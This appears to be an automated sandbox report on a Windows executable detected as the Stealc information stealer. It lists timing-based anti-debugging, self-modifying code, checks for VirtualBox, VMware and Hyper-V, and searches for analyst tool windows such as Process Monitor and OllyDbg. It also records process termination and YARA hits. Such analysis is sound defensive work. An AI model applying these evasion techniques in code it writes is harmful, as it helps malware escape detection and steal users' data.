              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60EB00 second address: 60EB05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60EC73 second address: 60EC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2B9CBCE6AFh 0x0000000c jne 00007F2B9CBCE6A6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60EC8F second address: 60EC99 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2B9CB0EC06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60EC99 second address: 60ECA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F2B9CBCE6A6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F13A second address: 60F13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F416 second address: 60F41A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F41A second address: 60F42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d je 00007F2B9CB0EC06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F42F second address: 60F443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F2B9CBCE6ACh 0x0000000e jne 00007F2B9CBCE6A6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F443 second address: 60F449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F449 second address: 60F44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6125A3 second address: 6125DB instructions: 0x00000000 rdtsc 0x00000002 js 00007F2B9CB0EC08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f and edx, 580E6F00h 0x00000015 jmp 00007F2B9CB0EC0Dh 0x0000001a push 00000004h 0x0000001c add edx, 26380817h 0x00000022 call 00007F2B9CB0EC09h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6125DB second address: 6125E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6125E2 second address: 612603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnp 00007F2B9CB0EC06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F2B9CB0EC10h 0x00000017 jmp 00007F2B9CB0EC0Ah 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612603 second address: 612608 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612608 second address: 612617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612617 second address: 61261D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61261D second address: 612629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6128F4 second address: 612944 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2B9CBCE6B8h 0x0000000e nop 0x0000000f jc 00007F2B9CBCE6B6h 0x00000015 push edi 0x00000016 jmp 00007F2B9CBCE6AEh 0x0000001b pop edx 0x0000001c push dword ptr [ebp+122D21ACh] 0x00000022 mov dx, 7E35h 0x00000026 call 00007F2B9CBCE6A9h 0x0000002b push ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543032E second address: 54303D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2B9CB0EC10h 0x00000009 sub ax, BCA8h 0x0000000e jmp 00007F2B9CB0EC0Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F2B9CB0EC18h 0x0000001a sub si, AF08h 0x0000001f jmp 00007F2B9CB0EC0Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xchg eax, ebp 0x00000029 jmp 00007F2B9CB0EC16h 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov eax, 6BA33CBDh 0x00000036 pushfd 0x00000037 jmp 00007F2B9CB0EC0Ah 0x0000003c xor ah, FFFFFF98h 0x0000003f jmp 00007F2B9CB0EC0Bh 0x00000044 popfd 0x00000045 popad 0x00000046 pop ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F2B9CB0EC15h 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 543041F second address: 5430423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430423 second address: 5430429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430429 second address: 5430497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2B9CBCE6B0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F2B9CBCE6B1h 0x00000017 xor esi, 59FD9906h 0x0000001d jmp 00007F2B9CBCE6B1h 0x00000022 popfd 0x00000023 mov si, 94B7h 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F2B9CBCE6B9h 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5430497 second address: 54304E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f mov ch, bh 0x00000011 call 00007F2B9CB0EC0Ch 0x00000016 pushfd 0x00000017 jmp 00007F2B9CB0EC12h 0x0000001c add si, 2468h 0x00000021 jmp 00007F2B9CB0EC0Bh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54304E1 second address: 54304E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54304E5 second address: 54304EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 545E08 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 36FC4C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5A783E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-29046
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-27864
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001319F0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_001319F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00133A70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00133A70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012DB80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0012DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001313B9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_001313B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001313A0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_001313A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013E3F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0013E3F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134C70 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00134C70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134C89 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00134C89
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001324F9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_001324F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001324E0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_001324E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013CDD0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0013CDD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001216B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_001216B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001216A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_001216A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013D720 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0013D720
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013DF20 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0013DF20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00141DC0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00141DC0
              Source: file.exe, file.exe, 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareMQ
              Source: file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081679058.0000000001456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27850
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27858
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27703
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27723
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00124A60 VirtualProtect 00000000,00000004,00000100,?0_2_00124A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001468F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001468F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001465A0 mov eax, dword ptr fs:[00000030h]0_2_001465A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00142910 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00142910
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5436, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144820 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00144820
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001448B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_001448B0
              Source: file.exe, file.exe, 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: mProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00142F30
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144040 lstrcpy,lstrcpy,GetSystemTime,0_2_00144040
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00142C10 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00142C10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00142DE0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00142DE0

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2040747804.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5436, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
